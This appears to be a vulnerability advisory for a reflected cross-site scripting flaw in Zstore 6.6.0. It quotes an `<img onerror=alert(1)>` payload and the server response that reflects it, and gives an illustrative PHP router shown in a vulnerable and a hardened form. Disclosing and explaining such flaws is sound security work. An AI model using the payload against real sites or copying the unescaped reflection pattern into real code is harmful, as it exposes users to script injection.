Exploits / Vulnerability Discovered : 2023-04-05 |
Type : webapps |
Platform : php
This exploit / vulnerability (Zstore 6.6.0 cross-site scripting (XSS)) is for educational purposes only; if you use it, you do so at your own risk!
## Description:
The value of manual insertion point 1 is copied into the HTML
document as plain text between tags.
The payload `giflc<img src=a onerror=alert(1)>c0yu0` was submitted in
manual insertion point 1.
This input was echoed unmodified in the application's response:
```
Class \App\Pages\Chatgiflc<a
href="https:\\www.youtube.com\watch?v=mhEvV9Q7zfE"><img
src=https:\\media.tenor.com\-K9sHxXAb-cAAAAC\shame-on-you-patricia.gif">
does not exist<br>82<br>/home/zippy00/zippy.com.ua/store/vendor/leon-mbs/zippy/core/webapplication.php<br>
```
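The pattern behind this class of bug, as an added illustration that is not Zstore's or the zippy framework's own code: a page router that builds a class name from a request value and echoes it back unescaped in a "does not exist" error, next to a hardened version that allowlists the page name and HTML-encodes anything it reflects. The `\App\Pages\` prefix comes from the response above; the function names and the `render()` method are assumptions.

```php
<?php
// Added example, not the framework's code. Both functions return the HTML
// body the application would send for a requested page name.

// Vulnerable pattern: the raw request value is concatenated into the error
// text, so markup such as <img src=a onerror=alert(1)> becomes live HTML.
function dispatchVulnerable(string $page): string
{
    $class = '\\App\\Pages\\' . $page;
    if (!class_exists($class)) {
        // User-controlled string lands in the HTML response unencoded.
        return 'Class ' . $class . ' does not exist<br>';
    }
    return (new $class())->render();
}

// Hardened pattern: only a plain identifier may reach class_exists() and
// the object instantiation, and whatever is reflected is HTML-encoded.
function dispatchHardened(string $page): string
{
    $safe = htmlspecialchars($page, ENT_QUOTES | ENT_HTML5, 'UTF-8');

    // Allowlist: a page name is a short identifier; anything else is rejected
    // before it can influence autoloading or class resolution.
    if (!preg_match('/^[A-Za-z][A-Za-z0-9_]{0,63}$/', $page)) {
        http_response_code(404);
        return 'Unknown page: ' . $safe . '<br>';
    }

    $class = '\\App\\Pages\\' . $page;
    if (!class_exists($class)) {
        http_response_code(404);
        // Encoding keeps the reflection inert even if the regex is relaxed later.
        return 'Unknown page: ' . $safe . '<br>';
    }
    return (new $class())->render();
}

// Payload quoted in the advisory, prefixed with the page name seen in the response.
$payload = 'Chatgiflc<img src=a onerror=alert(1)>c0yu0';

echo dispatchVulnerable($payload), PHP_EOL; // markup reflected verbatim
echo dispatchHardened($payload), PHP_EOL;   // rejected and encoded
```

Running it from the CLI shows the difference directly: the first line contains a working `<img onerror>` tag, the second only `&lt;img ...&gt;`.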
## Proof and Exploit:
[Proof-of-concept video](https://streamable.com/aadj5c)